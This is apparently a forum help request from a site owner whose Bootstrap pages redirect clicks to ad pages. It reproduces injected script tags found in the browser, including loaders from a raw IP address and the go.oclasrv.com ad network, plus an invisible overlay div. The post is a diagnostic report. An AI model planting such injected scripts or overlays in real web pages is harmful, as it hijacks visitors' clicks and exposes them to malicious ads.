Issue:- Upon clicking on the NAVBAR menu or any div element on my bootstrap website, it sometimes redirects to unwanted ads or unfamiliar links in a new tab.
Links imported from hosted file:-
<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">
<script src="js/jquery.min.js"></script>
<script src="js/main.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link rel="stylesheet" type="text/css" href="css\style.css">
<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
crossorigin="anonymous">
<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>
Findings during Inspection:-
I have meticulously reviewed my code multiple times when the redirection occurs on clicking the menu. I couldn't identify anything suspicious... But upon closer inspection when the redirect links appeared, I noticed additional script sources embedded into my files (visible only in browser inspection mode). These unknown parts of my code stand out.
1) The following 2 scripts are replacing 'js/jquery.min.js' in the head tag:
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530041241377&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>
<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" type="text/javascript"></script>
2) This element is added to the body tag right after importing the Google API:
<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>
3) Another element found in the body tag:
<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>
4) Analysis of the redirect link reveals the following HEADERS information:
Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644
Steps taken to resolve the issue:-
After thorough examination, I confirm that there is no script within my code causing these redirects. It's likely an issue with my browser or Windows system being compromised. To address this, I tested the website across three different browsers - EDGE, CHROME, FIREFOX - and encountered the same problem. Subsequently, I upgraded to Windows 10 from Windows 7 and performed a fresh installation, but the issue persisted. Seeking assistance from Hostgator support yielded no evidence of server compromise. I also ran malware detection software, which merely alerted me that the browsers were redirecting to outbound IDs with domain names such as go.oclasrv.com without taking any corrective action.
**
Seeking a Resolution???
**
UPDATE:-
A similar redirect occurred while accessing Hostgator support feedback link..
Upon careful observation, I noted that the domain name in the string was replaced by rateus.in The zoneid=1492761 remained consistent regardless of the insecure link accessed... Additionally, cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx varied across different links, while fingerprint=c2VwLW5vLXJlZGlyZWN0 remained constant throughout all visited links.
<script async="" src="//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530191489196&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>
<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag"></script>
<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>
My operating system has been fully upgraded to Windows 10 Pro with Chrome as the exclusive browser sans any plugins...
The issue persists across various browsers including EDGE and Firefox.
Any JavaScript experts available to provide guidance?